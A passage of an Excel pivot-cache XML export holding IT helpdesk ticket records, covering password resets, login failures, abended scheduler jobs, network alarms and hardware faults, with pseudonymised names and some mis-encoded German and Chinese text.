exception_x000d__x000a__x000d__x000a_please get this fixed soon as we have lot of uacyltoe hxgayczeing going on in qa and we need the qa system back on line soon. our vendors are also about to demo the new project that they completed for company to the business and since we have certificate issue, they had to postpone it. hence, please treat this as urgent and fix as soon as possible._x000d__x000a_"/>
    <s v="tskwevno sjhpoakl"/>
    <x v="13"/>
  </r>
  <r>
    <s v="please change email address of user gncpezhx hopqcvza from @company.com to @company.com"/>
    <s v="please change email address of user gncpezhx hopqcvza from @company.com to @company.com"/>
    <s v="crkdjbot qiztrxne"/>
    <x v="19"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: bk_hana_SID_62_os_dly_dp"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: bk_hana_SID_62_os_dly_dp at 08/05/16 10:47:26"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="7"/>
  </r>
  <r>
    <s v="ethics issue "/>
    <s v="inc1538003 : please turn off eligibility for ethics for user wqinjkxs azoyklqe _x000d__x000a_inc1538001 : please change email address of user gncpezhx hopqcvza from @company.com to @company.com"/>
    <s v="crkdjbot qiztrxne"/>
    <x v="0"/>
  </r>
  <r>
    <s v="mdm tool not working via citrix system"/>
    <s v="hello team, _x000d__x000a_could you please support with mdm issue via citrix? _x000d__x000a_the application mdm data manager and mdm import manager does not work when trying to upload catalogs._x000d__x000a__x000d__x000a_you can find the error print screen attached._x000d__x000a__x000d__x000a_"/>
    <s v="nlrfzxsd ecibvgxr"/>
    <x v="11"/>
  </r>
  <r>
    <s v="benefits issue"/>
    <s v="benefits issue"/>
    <s v="bmhrsxlf ukatbwyi"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to login to skype - certificate error"/>
    <s v="unable to login to skype - certificate error"/>
    <s v="aetvprsf ewmcrqja"/>
    <x v="0"/>
  </r>
  <r>
    <s v="xerox copier prtqx7302 will not scan to email."/>
    <s v="xerox copier prtqx7302 will not scan to email."/>
    <s v="tpqhevdg zluijfwv"/>
    <x v="2"/>
  </r>
  <r>
    <s v="ticket update on inplant_847905"/>
    <s v="ticket update on inplant_847905"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ticket (ticket_no1538972) update to anftgup nftgyair"/>
    <s v="ticket (ticket_no1538972) update to anftgup nftgyair"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="72"/>
  </r>
  <r>
    <s v="outlook issue : crm giving error message."/>
    <s v="outlook issue : crm giving error message."/>
    <s v="oqzgvkrh jiylqwtc"/>
    <x v="0"/>
  </r>
  <r>
    <s v="my outlook will not open.  it is stuck with a screen showing &quot;processing&quot;."/>
    <s v="my outlook will not open.  it is stuck with a screen showing &quot;processing&quot;."/>
    <s v="zxvjsipd jbzmgyvd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="mobile broad band issue : 7350 "/>
    <s v="mobile broad band issue : 7350 "/>
    <s v="oqzgvkrh jiylqwtc"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ap 'usa-training-room' disassociated from controller '57.81.82.962'. - controller name: company-wlc-8510-1"/>
    <s v="_x000d__x000a__x000d__x000a_received from: sthyuraj.sektyhar@company.com_x000d__x000a__x000d__x000a_alarm: ap 'usa-training-room' disassociated from controller '57.81.82.962'. - controller name: company-wlc-8510-1_x000d__x000a_timestamp: august 5, 2016 7:07:12 am edt_x000d__x000a_device: usa-training-room,00:16:9c:91:1e:50_x000d__x000a_severity: critical_x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="sxhqfaoe evobwgiy"/>
    <x v="3"/>
  </r>
  <r>
    <s v="reset the password for nvawmlch ubyjolnc on erp / production / erp"/>
    <s v="please reset my password. i did find out why it can't log on after a 24 hours time period. because when i reset my pass word i was on wi-fi. "/>
    <s v="nvawmlch ubyjolnc"/>
    <x v="0"/>
  </r>
  <r>
    <s v="password change"/>
    <s v="_x000d__x000a__x000d__x000a_received from: rvdwyapu.fubjamlr@gmail.com_x000d__x000a__x000d__x000a_i am locked out of password_management_tool password change because of too many attempts (my password wouldn't work) could you please re-set me_x000d__x000a__x000d__x000a_"/>
    <s v="rvdwyapu fubjamlr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="spoof email issue"/>
    <s v="from: ugyothfz ugrmkdhx _x000a_sent: friday, august 05, 2016 6:52 pm_x000a_to: ed pasgryowski &lt;ucosgrfy.aeithcvp@gmail.com&gt;; rxuobtjg grcmqaxd &lt;rxuobtjg.grcmqaxd@gmail.com&gt;; tiyhum kuyiomar &lt;glnfyoqe.fexliuytreu@gmail.com&gt;; hqbxstoy mdjftxli &lt;hqbxstoy.mdjftxli@gmail.com&gt;; dfupksnr drnqjzph &lt;dfupksnr.drnqjzph@gmail.com&gt;; epilwzux qjhitbcr &lt;epilwzux.qjhitbcr@gmail.com&gt;; zarlgjes nxjvzcta &lt;zarlgjes.nxjvzcta@gmail.com&gt;; kzishqfu bmdawzoi &lt;kzishqfu.bmdawzoi@gmail.com&gt;_x000a_cc: kathght shfhyw &lt;afkstcev.utbnkyop@gmail.com&gt;; -sadmin &lt;-sadmin@company.com&gt;; hnynhsth jsuyhwssad &lt;bxspwfyo.vzystwor@gmail.com&gt;; qfrntose ivnhumzjalakrisyuhnyrtn &lt;qfrntose.ivnhumzj@gmail.com&gt;_x000a_subject: spoof email issue_x000a__x000a_hello all,_x000a__x000a_"/>
    <s v="hqbxstoy mdjftxli"/>
    <x v="19"/>
  </r>
  <r>
    <s v="server HostName_973 is not responding"/>
    <s v="we are attempting to login into our tax_interface software to apply updates and server HostName_973 is not responding.  this is the second time within two weeks that we are having an issue with this server.  please advise when issue has been corrected._x000d__x000a_"/>
    <s v="cgqfdotb wtefjknd"/>
    <x v="13"/>
  </r>
  <r>
    <s v="formatar micro"/>
    <s v="formatar micro"/>
    <s v="zuyimtsf qjtimdsp"/>
    <x v="62"/>
  </r>
  <r>
    <s v="security error in reisekosten abrechnungs programdnty"/>
    <s v="security error in reisekosten abrechnungs programdnty"/>
    <s v="sjxhcyrq iupxtjcf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="folder access"/>
    <s v="_x000d__x000a__x000d__x000a_received from: pjxclyhs.fcniljtu@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_please give full access to hmovlkyq kinawsdv and iechuoxb zcejmwsq to the following folder:_x000d__x000a__x000d__x000a_\\HostName_768\teams\finance\global bank bals fy17&lt;file:///\\HostName_768\teams\finance\global%20bank%20bals%20fy17&gt;_x000d__x000a__x000d__x000a__x000d__x000a_kind "/>
    <s v="pjxclyhs fcniljtu"/>
    <x v="33"/>
  </r>
  <r>
    <s v="supply_chain_software"/>
    <s v="_x000d__x000a__x000d__x000a_received from: yiramdntyjqc.qtrcepsa@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a_i am unable to access supply_chain_software. it will not recognize my password._x000d__x000a_"/>
    <s v="yiramjqc qtrcepsa"/>
    <x v="0"/>
  </r>
  <r>
    <s v="HostName_1132:memory usage is now 98%"/>
    <s v="internal error: unable to find any processes._x000d__x000a_probe 'processes' failed to start (command = processes.exe) error = (1450) insufficient system resources exist to complete the requested service.  "/>
    <s v="oldrctiu bxurpsyi"/>
    <x v="11"/>
  </r>
  <r>
    <s v="company screensaver "/>
    <s v="company screensaver "/>
    <s v="eagvusbr nguqityl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to unlock user accounts in password_management_tool id password manager"/>
    <s v="password_management_tool problem - look at the &quot;unlock accounts&quot; log. this happens to each and every user"/>
    <s v="hbmwlprq ilfvyodx"/>
    <x v="19"/>
  </r>
  <r>
    <s v="welcome screen in the germany lobby is not working any more - please check"/>
    <s v="welcome screen in the germany lobby is not working any more - please check"/>
    <s v="hyobjnic pmvbwqfe"/>
    <x v="28"/>
  </r>
  <r>
    <s v="skype"/>
    <s v="_x000d__x000a__x000d__x000a_received from: lpoebzsc.grknswyo@gmail.com_x000d__x000a__x000d__x000a_i was looking for pathryu etasthon on skype.  i type in his name in the search bar, and his picture shows up with robdyhr hhnght's name beside it._x000d__x000a_nvamcrpq gkrlmxne does not show up at all.  robdyhr hhnght is no longer with company.   perhaps communications intended and sent to robdyhr hhnght are being forwarded to pat, and the settings are incorrect._x000d__x000a__x000d__x000a_in any event, can you have someone look into this and correct._x000d__x000a_"/>
    <s v="lpoebzsc grknswyo"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to launch outlook"/>
    <s v="unable to launch outlook"/>
    <s v="wjtzrmqc ikqpbflg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ms crm dynamics for outlook : "/>
    <s v="ms crm dynamics for outlook : _x000d__x000a_error : an error occurred prompting this item to ms dynamics crm"/>
    <s v="wsczgfal hjfklsdg"/>
    <x v="39"/>
  </r>
  <r>
    <s v="i am a new employee and don't have access to hr_tool, benefits, ethics, and drives other than c."/>
    <s v="x5314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_x000a__x000d__x000a_"/>
    <s v="oqvwgnkc gkjylpzx"/>
    <x v="19"/>
  </r>
  <r>
    <s v="ticket update on ticket_no0427861"/>
    <s v="ticket update on ticket_no0427861"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="supply_chain_software password reset "/>
    <s v="supply_chain_software password reset "/>
    <s v="qftpazns fxpnytmk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="chat disconnected"/>
    <s v="chat disconnected"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="password reset for supply_chain_software"/>
    <s v="password reset for supply_chain_software_x000a_user id : ludwidjfft"/>
    <s v="xeucniqa dwpsevof"/>
    <x v="0"/>
  </r>
  <r>
    <s v="supply_chain_software login"/>
    <s v="_x000a__x000a_received from: ryafbthn.mijhmiles@company.com_x000a__x000a_good morning,_x000a__x000a_i am unable to log into supply_chain_software.  can you please reset my password?_x000a__x000a_ryafbthn mijhmijhmiles_x000a_leader of sales â€“ msc_x000a_ryafbthn.mijhmiles@company.com&lt;mailto:ryafbthn.mijhmiles@company.com&gt;_x000a_"/>
    <s v="gbfdksqi whjtkilf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="pobleme mit we_combi \jionmpsf wnkpzcmv"/>
    <s v="pobleme mit we_combi \jionmpsf wnkpzcmv"/>
    <s v="jionmpsf wnkpzcmv"/>
    <x v="24"/>
  </r>
  <r>
    <s v="langsamer rechner \Ã¼berprÃ¼fung \niptbwdq csenjruz"/>
    <s v="langsamer rechner \Ã¼berprÃ¼fung \niptbwdq csenjruz"/>
    <s v="niptbwdq csenjruz"/>
    <x v="24"/>
  </r>
  <r>
    <s v="attendance_tool is not loading in internet explorer (missing adobe flash player)"/>
    <s v="attendance_tool is not loading in internet explorer (missing adobe flash player)"/>
    <s v="xjzcbgnp vfkwscao"/>
    <x v="18"/>
  </r>
  <r>
    <s v="setup new ws \kebogxzp difnjlkp "/>
    <s v="setup new ws \kebogxzp difnjlkp "/>
    <s v="kebogxzp difnjlkp"/>
    <x v="24"/>
  </r>
  <r>
    <s v="bluetooth keybankrd defekt \dardabthyr"/>
    <s v="bluetooth keybankrd defekt \dardabthyr"/>
    <s v="sfwdqlzx sldczfjt"/>
    <x v="24"/>
  </r>
  <r>
    <s v="erp login"/>
    <s v="_x000d__x000a__x000d__x000a_received from: udetjzmn.ayueswcm@gmail.com_x000d__x000a__x000d__x000a_good morning_x000d__x000a__x000d__x000a_can you please reset my erp login as it tells me my password is incorrect._x000d__x000a__x000d__x000a_"/>
    <s v="udetjzmn ayueswcm"/>
    <x v="0"/>
  </r>
  <r>
    <s v="probleme mit bildschirmschoner \ we91 \jionmpsf wnkpzcmv"/>
    <s v="probleme mit bildschirmschoner \ we91 \jionmpsf wnkpzcmv"/>
    <s v="jionmpsf wnkpzcmv"/>
    <x v="24"/>
  </r>
  <r>
    <s v="mobiltelefon defekt"/>
    <s v="mobiltelefon gigaset m2 professional mit der durchwahl 479 _x000d__x000a_akku  ( defekt hÃ¤lt nicht mehr lÃ¤nger wie 1 tag ) _x000d__x000a_display ( kann man kaum noch was erkennen )_x000d__x000a_clip defekt._x000d__x000a_"/>
    <s v="ptvdxwla tlevwmzo"/>
    <x v="32"/>
  </r>
  <r>
    <s v="scm_software "/>
    <s v="_x000a__x000a_received from: oetlgbfw.bsctrnwp@gmail.com_x000a__x000a_i am not able to login my account_x000a_i must have the wrong password_x000a__x000a_matghyuthdw is my username_x000a__x000a_dan,_x000a_welcome to s&amp;op .. i've created your user account; please use following logn credentials:_x000a__x000a__x000a__x000a__x000a_dthyan matheywtyuews_x000a_sales manager gl2_x000a_oetlgbfw.bsctrnwp@gmail.com&lt;mailto:oetlgbfw.bsctrnwp@gmail.com&gt;_x000a_t_x000a_"/>
    <s v="oetlgbfw bsctrnwp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="driver update"/>
    <s v="_x000d__x000a__x000d__x000a_received from: kbdljsxf.kcmqtjgf@gmail.com_x000d__x000a__x000d__x000a_hello team,_x000d__x000a__x000d__x000a_can you please update the drive and graphic card for my laptop â€“ dell e5470 , let me know if you required further details._x000d__x000a__x000d__x000a_"/>
    <s v="kbdljsxf kcmqtjgf"/>
    <x v="18"/>
  </r>
  <r>
    <s v="erp business objects analysis for excel - error message: add-in is not registered correctly"/>
    <s v="_x000d__x000a_summary:i need acces to run bex reports showing margins.  it should be the same access as qkmgtnla buraxcij &amp; pqkthilr uitfqsen_x000d__x000a__x000d__x000a_also _x000d__x000a__x000d__x000a__x000d__x000a_i also had erp business objects loaded onto my machine.  however, it does not work.  i get the following message  &quot;the launcher is exited with error, see log file for more details.  the analysis add-in is not registered correctly&quot;"/>
    <s v="vsbtygin oufhtbas"/>
    <x v="8"/>
  </r>
  <r>
    <s v="windows account lockout"/>
    <s v="windows account lockout"/>
    <s v="hvjmxkcp pvzlgeyw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ich kann mein erp passwort nicht zurÃ¼ck setzten."/>
    <s v="ich weiÃŸ mein erp passwort nicht mehr und habe 3 fehlversuche eingegeben. bitte zurÃ¼cksetzen."/>
    <s v="wfbkucds qaxhbois"/>
    <x v="0"/>
  </r>
  <r>
    <s v="vmware tools are not running on the server HostName_1045 which is resided on host HostName_1178"/>
    <s v="vmware tools are not running on the server HostName_1045 which is resided on host HostName_1178, because of this backup Job_481 is failing "/>
    <s v="dkmcfreg anwmfvlg"/>
    <x v="11"/>
  </r>
  <r>
    <s v="new employee not able to login to system vvrtgwildj"/>
    <s v=" user id : vvrtgwildj_x000a_name : johghajknnes wildschuetz_x000a__x000a_user logging in for the first time and getting _x000a__x000a_error : die sicherheisdatenbank auf dem server enthÃ¤lt kein computerkonto fÃ¼r diese arbeitsstationsvertrauensstellung_x000a_error: the security database on the server does not contain a computer account for this workstation trust relationship _x000a_computer name : efdl8111226_x000a__x000a_contact # : _x000a_"/>
    <s v="wczrtsja crwioekx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="lhqsm518(fim production): miiserver.exe: wrong number of instances of process miiserver.exe"/>
    <s v="lhqsm518(fim production): miiserver.exe: wrong number of instances of process miiserver.exe, expected instances gte 1 but found 0"/>
    <s v="dkmcfreg anwmfvlg"/>
    <x v="11"/>
  </r>
  <r>
    <s v="new email problem"/>
    <s v="new email problem"/>
    <s v="ythucdjx mujfrsyl"/>
    <x v="18"/>
  </r>
  <r>
    <s v="zlxcsqdg ckpojwir cannot see all his customer accounts in msd crm "/>
    <s v="m. wilfert does not find three customers that are included in his sales plan in ms crm on the &quot;my active accounts&quot; view. also, he thinks he has some in the list that do not belong to him. attached his email to this ticket ."/>
    <s v="zlxcsqdg ckpojwir"/>
    <x v="22"/>
  </r>
  <r>
    <s v="laptop key bankrd not working"/>
    <s v="_x000d__x000a__x000d__x000a_received from: ivohcdpw.ixcanwbm@gmail.com_x000d__x000a__x000d__x000a_dear sir_x000d__x000a_keybankrd of laptop is not working. please do the need full_x000d__x000a__x000d__x000a_laptop details :_x000d__x000a__x000d__x000a_dell latitude 7350 win 8.1  x64 bit_x000d__x000a_service tag : j822362_x000d__x000a_computer name : ainl9912382_x000d__x000a_india branch_x000d__x000a__x000d__x000a__x000d__x000a_with best "/>
    <s v="ivohcdpw ixcanwbm"/>
    <x v="18"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: Job_593"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: Job_593 at 08/05/16 04:59:27"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="7"/>
  </r>
  <r>
    <s v="telephony_software  -  status update"/>
    <s v="telephony_software  -  automated status update_x000a__x000a_user zjcsqtdn jikyworg activated the screen saver by pressing windows + l._x000a_gabryltkla maier (germany warehouse) were calling her, the phone was ringing and christgryta's status was changed to acd - agent not answering automatically._x000a_by loging on again the status was remaining at acd- agent not answering._x000a_call id.:  2175992332_x000a__x000a_as we facing that gap occationally would you please let us know if we could have the status changing back again to available automatically._x000a__x000a_"/>
    <s v="atlwdyej vtlhzbix"/>
    <x v="6"/>
  </r>
  <r>
    <s v="distributor_tool not laoding "/>
    <s v="distributor_tool not loading "/>
    <s v="dypabsjm nuzvhjik"/>
    <x v="0"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: Job_467"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: Job_467 at 08/05/16 04:38:26"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="7"/>
  </r>
  <r>
    <s v="bls (beschichtungsleitstand) germany workflow error - pvd"/>
    <s v="error message: &quot;laufzeitfehler '94': ungÃ¼ltige verwendung von null&quot; _x000d__x000a__x000d__x000a_prompted at step: &quot;auftragsausgang &gt; von revision freigegeben&quot; pressing okay results in a programdnty crash._x000d__x000a__x000d__x000a_error occured first time this morning 6 am cet. _x000d__x000a__x000d__x000a_there is one batch at this step (von revision freigegeben) at the moment: 7320. batches after that stage in the workflow can be processed as usual, however workflow is interrupted and batches directly before critical stage can be further processed. happens only for pvd. cvd is running without any issues. _x000d__x000a__x000d__x000a_"/>
    <s v="xsjqhdgp ymstzudl"/>
    <x v="25"/>
  </r>
  <r>
    <s v="erp crm(SID_39 web) sold-to accounts is saved without division. urgent"/>
    <s v="sold-to account (81926490) is extended to null/empty division. it can't happened that sold-to account is saved without mandatory fields. this is big issue._x000d__x000a_this issue is generating failed queue items in crm msd. please investigate how the system allowed the user to save it._x000d__x000a__x000d__x000a_"/>
    <s v="rcbdyslq zuspjbtw"/>
    <x v="14"/>
  </r>
  <r>
    <s v="zmcp is not working for plant_33 personnel.    review su53 - created instead of  ticket_no ticket_no0426629"/>
    <s v="qwsjptlo hnlasbed_x000a__x000a_erp_x000a_SID_34_x000a__x000a_&quot;printed&quot; to jc00_x000a_spool no. 9963485_x000a_userid lynerwjgthy_x000a__x000a_if the plant code is set at plant_34, label print is successful.   when plant code is set to plant_33, error message and no output."/>
    <s v="goaxzsql qpjnbgsa"/>
    <x v="20"/>
  </r>
  <r>
    <s v="der drucker fÃ¼r die ups-lapels druckt nicht richtig. "/>
    <s v="der drucker steht am platz von wckrxovs aunsgzmd"/>
    <s v="kiqrvwat gwkpxzyt"/>
    <x v="32"/>
  </r>
  <r>
    <s v="dock station "/>
    <s v="dock station is not working "/>
    <s v="ndsyovil pymzvdqa"/>
    <x v="18"/>
  </r>
  <r>
    <s v="password reset request through password_management_tool password."/>
    <s v="password reset request through password_management_tool password."/>
    <s v="dypabsjm nuzvhjik"/>
    <x v="0"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: Job_481"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: Job_481 at 08/05/16 04:03:26"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="7"/>
  </r>
  <r>
    <s v="cursor moving on its own while typing."/>
    <s v="i got the new laptop recently and cursor jumps or moves on its own, automatically, randomly while typing in windows laptop "/>
    <s v="qxpytolu smagdipr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to login the impact award login screen."/>
    <s v="i am unable to login the url: "/>
    <s v="qxpytolu smagdipr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="turn off telephony_software for turkey between 10:50 - 12:00 local time."/>
    <s v="turn off telephony_software for turkey between 10:50 - 12:00 local time due to meeting. _x000d__x000a_approved by djpwfxzt cfkwxlmq."/>
    <s v="lhycpqra fdhyxqrw"/>
    <x v="6"/>
  </r>
  <r>
    <s v="configair server in production not responding - 500 internal server error"/>
    <s v="config air server runs into 500 internal server error._x000d__x000a_message: &quot;error: while trying to invoke the method java.util.list.iterator() of a null object loaded from local variable 'locallist'_x000d__x000a_this error happens with the csscdrill model._x000d__x000a__x000d__x000a_with the mill_model model configair is coming up but the model is not working. _x000d__x000a__x000d__x000a_this has directly business impact for quotations."/>
    <s v="iavozegx jpcudyfi"/>
    <x v="13"/>
  </r>
  <r>
    <s v="reset the password for obvyknzx gzvjtish on erp / production / erp"/>
    <s v="please reset my erp password SID_34"/>
    <s v="obvyknzx gzvjtish"/>
    <x v="0"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: Job_483"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: Job_483 at 08/05/16 03:34:26"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="7"/>
  </r>
  <r>
    <s v="please reset password for user catgyhilp (ess kiosk user)"/>
    <s v="please reset password for user catgyhilp (ess kiosk user) please email change information to coatea or whatlgp"/>
    <s v="usdykwvf oswvlmje"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to connect to wifi"/>
    <s v="unable to connect to wifi"/>
    <s v="incjpxsq gdxbvaqz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="password reset erp SID_34"/>
    <s v="password reset erp SID_34"/>
    <s v="rcukxbvw pvnuqlyb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="r: finished: start of s&amp;op process"/>
    <s v="_x000d__x000a__x000d__x000a_received from: xfdkwusj.gyklresa@gmail.com_x000d__x000a__x000d__x000a_hello_x000d__x000a_unable to sign in after java update, see the message_x000d__x000a__x000d__x000a_[cid:image001.jpg@01d1eef4.8507SID_530]_x000d__x000a__x000d__x000a_best "/>
    <s v="xfdkwusj gyklresa"/>
    <x v="0"/>
  </r>
  <r>
    <s v="aw: SID_1 erp"/>
    <s v="_x000d__x000a__x000d__x000a_received from: jofghyuach.nerreter@company.com_x000d__x000a__x000d__x000a_hello sandrgru,_x000d__x000a__x000d__x000a_please check your gui settings for SID_1. should be:_x000d__x000a__x000d__x000a_[cid:image003.png@01d1eef4.09ad5380]_x000d__x000a__x000d__x000a_"/>
    <s v="slubnjry qcrabvoe"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp &amp; business_client password blocked"/>
    <s v="from: asfgthok topefd_x000a_sent: friday, august 05, 2016 11:19 am_x000a_to: nwfodmhc exurcwkm_x000a_subject: rad:fw: erp &amp; business_client password blocked_x000a_importance: high_x000a__x000a_hello ,_x000a_again i am facing the issue while opening the erp._x000a_password has been blocked._x000a__x000a_let us do needful._x000a__x000a_best "/>
    <s v="weupycai epqhduro"/>
    <x v="0"/>
  </r>
  <r>
    <s v="need teamviewer full version and visio application"/>
    <s v="need teamviewer full version and visio application"/>
    <s v="welztypu yseckbvf"/>
    <x v="18"/>
  </r>
  <r>
    <s v="calculation of the claim amount will make a mistake."/>
    <s v="from: uxndyfrs vahxnfgl [mailto:uxndyfrs.vahxnfgl@gmail.com] _x000d__x000a_sent: friday, august 05, 2016 10:53 am_x000d__x000a_to: nwfodmhc exurcwkm_x000d__x000a_subject: rad:fw: calculation of the claim amount will make a mistake._x000d__x000a__x000d__x000a_hi_x000d__x000a__x000d__x000a_calculation of the claim amount will make a mistake._x000d__x000a_please fix this._x000d__x000a__x000d__x000a_the total amount of money usd 2770_x000d__x000a__x000d__x000a_best "/>
    <s v="uxndyfrs vahxnfgl"/>
    <x v="12"/>
  </r>
  <r>
    <s v="æ— æ³•ç™»é™†hr_toolè€ƒå‹¤ç³»ç»Ÿ"/>
    <s v="æ˜¾ç¤ºjavaæ’ä»¶æ— æ³•åŠ è½½ï¼Œæ‰€éœ€ç‰ˆæœ¬1.8.0.-45æˆ–æ›´é«˜ç‰ˆæœ¬ã€‚"/>
    <s v="kyagjxdh dmtjpbnz"/>
    <x v="30"/>
  </r>
  <r>
    <s v="windows account locked"/>
    <s v="windows account locked"/>
    <s v="nfckwprm iykptjna"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp crm complaint when is assigned generating duplicate email"/>
    <s v="when we update the complaint with assigned status &amp;  employee responsible , system is sending duplicate emails to sales employee &amp; employee responsible. "/>
    <s v="aoyrspjv hctgfeal"/>
    <x v="14"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: Job_1148"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: Job_1148 at 08/05/16 01:15:24"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="8"/>
  </r>
  <r>
    <s v="reboot lhqsm286 (patent web uacyltoe hxgaycze server) server at 11:00 pm et on 08/04."/>
    <s v="reboot lhqsm286 (patent web uacyltoe hxgaycze server) server at 11:00 pm et on 08/04."/>
    <s v="uvrbhlnt bjrmalzi"/>
    <x v="7"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: Job_1141"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: Job_1141 at 08/04/16 23:45:28"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="8"/>
  </r>
  <r>
    <s v="kindly refer mail-renew account for visfgthal--- vvjodav,goptijdtnsya b- vsbhyrt"/>
    <s v="hello snhdfihytu,_x000a_kindly refer mail-renew account for visfgthal--- vvjodav,goptijdtnsya b- vsbhyrt_x000a__x000a_extn-393_x000a_jayhrt bhatyr"/>
    <s v="rmdtqfxa fwpnqdxo"/>
    <x v="19"/>
  </r>
  <r>
    <s v="SID_1 log in issue"/>
    <s v="_x000d__x000a__x000d__x000a_received from: rjanhbde.owfkyjcp@gmail.com_x000d__x000a__x000d__x000a_could log on to SID_1 uacyltoe hxgaycze system_x000d__x000a__x000d__x000a__x000d__x000a_[cid:image001.png@01d1eef6.2418b6e0]_x000d__x000a__x000d__x000a_warm "/>
    <s v="rjanhbde owfkyjcp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="vpn è¿žæŽ¥ä¸ä¸Š"/>
    <s v="vpnè¿žä¸ä¸Šï¼Œè¯·è½¬ç»™ è´ºæ­£å¹³ atcbvglq.bdvmuszt@gmail.com"/>
    <s v="fcvqezmn frzyjknu"/>
    <x v="30"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: bkwin_HostName_770_inc"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: bkwin_HostName_770_inc at 08/04/16 22:30:29"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="7"/>
  </r>
  <r>
    <s v="hi it help team,  please unblock my new company device."/>
    <s v="from: ntydihzo aeptfbgs _x000d__x000a_sent: friday, august 05, 2016 2:51 am_x000d__x000a_to: nwfodmhc exurcwkm_x000d__x000a_subject: wg: die synchronisierung mit exchange activesync ist auf ihrem gerÃ¤t vorÃ¼bergehend blockiert, bis der zugriff vom administrator gewÃ¤hrt wird._x000d__x000a_importance: high_x000d__x000a__x000d__x000a_hi it help team,_x000d__x000a__x000d__x000a_please unblock my new company device._x000d__x000a__x000d__x000a_"/>
    <s v="ntydihzo aeptfbgs"/>
    <x v="0"/>
  </r>
  <r>
    <s v=" can you unblock my account so i can use outlook app?"/>
    <s v="from: nwfodmhc exurcwkm _x000a_sent: friday, august 05, 2016 6:32 am_x000a_to: prishry budhtya_x000a_subject: re: rak re: your mobile device has been denied access to the server via exchange activesync because of server policies._x000a__x000a_dear prishry,_x000a__x000a_"/>
    <s v="eqzibjhw ymebpoih"/>
    <x v="0"/>
  </r>
  <r>
    <s v="plant_101 value added services - one day pick route project."/>
    <s v="request to phase in additional vas customers. file attached with customer accounts.._x000d__x000a_add 1 pick day in supply_chain for the customers in attached list for plant_101 only."/>
    <s v="xnqzhtwu hivumtfz"/>
    <x v="17"/>
  </r>
  <r>
    <s v="please review your recent ticketing_tool tickets and let me know who modified the ethics collaboration_platform site"/>
    <s v="from: mikhghytr wafglhdrhjop _x000a_sent: thursday, august 04, 2016 8:50 pm_x000a_to: nwfodmhc exurcwkm_x000a_subject: rak fw: ethics collaboration_platform site_x000a__x000a_please review your recent ticketing_tool tickets and let me know who modified the ethics collaboration_platform site.  a few weeks ago i had requested a change that placed a third column of selections.  not sure who or why this was undone._x000a__x000a_mikhghytr wafglhdrhjop_x000a_sr. manager, global ethics and compliance programdntys_x000a_from: kzbuhixt zjdmoahr _x000a_sent: thursday, august 04, 2016 11:16 am_x000a_to: mikhghytr wafglhdrhjop &lt;azxhejvq.fyemlavd@gmail.com&gt;_x000a_subject: re: ethics collaboration_platform site_x000a__x000a_ohâ€¦â€¦??_x000a__x000a_sethdyr hdtyr_x000a_assistant general counsel â€“ compliance and real estate_x000a_global director of ethics &amp; compliance; ccep_x000a_kzbuhixt.zjdmoahr@gmail.com _x000a_"/>
    <s v="azxhejvq fyemlavd"/>
    <x v="15"/>
  </r>
  <r>
    <s v="ç”µè„‘å¼€æœºå¼€ä¸å‡ºæ¥"/>
    <s v="to å°è´ºï¼Œæ—©ä¸Šç”µè„‘å¼€æœºå¼€ä¸å‡ºæ¥"/>
    <s v="xqyjztnm onfusvlz"/>
    <x v="30"/>
  </r>
  <r>
    <s v="ticket update"/>
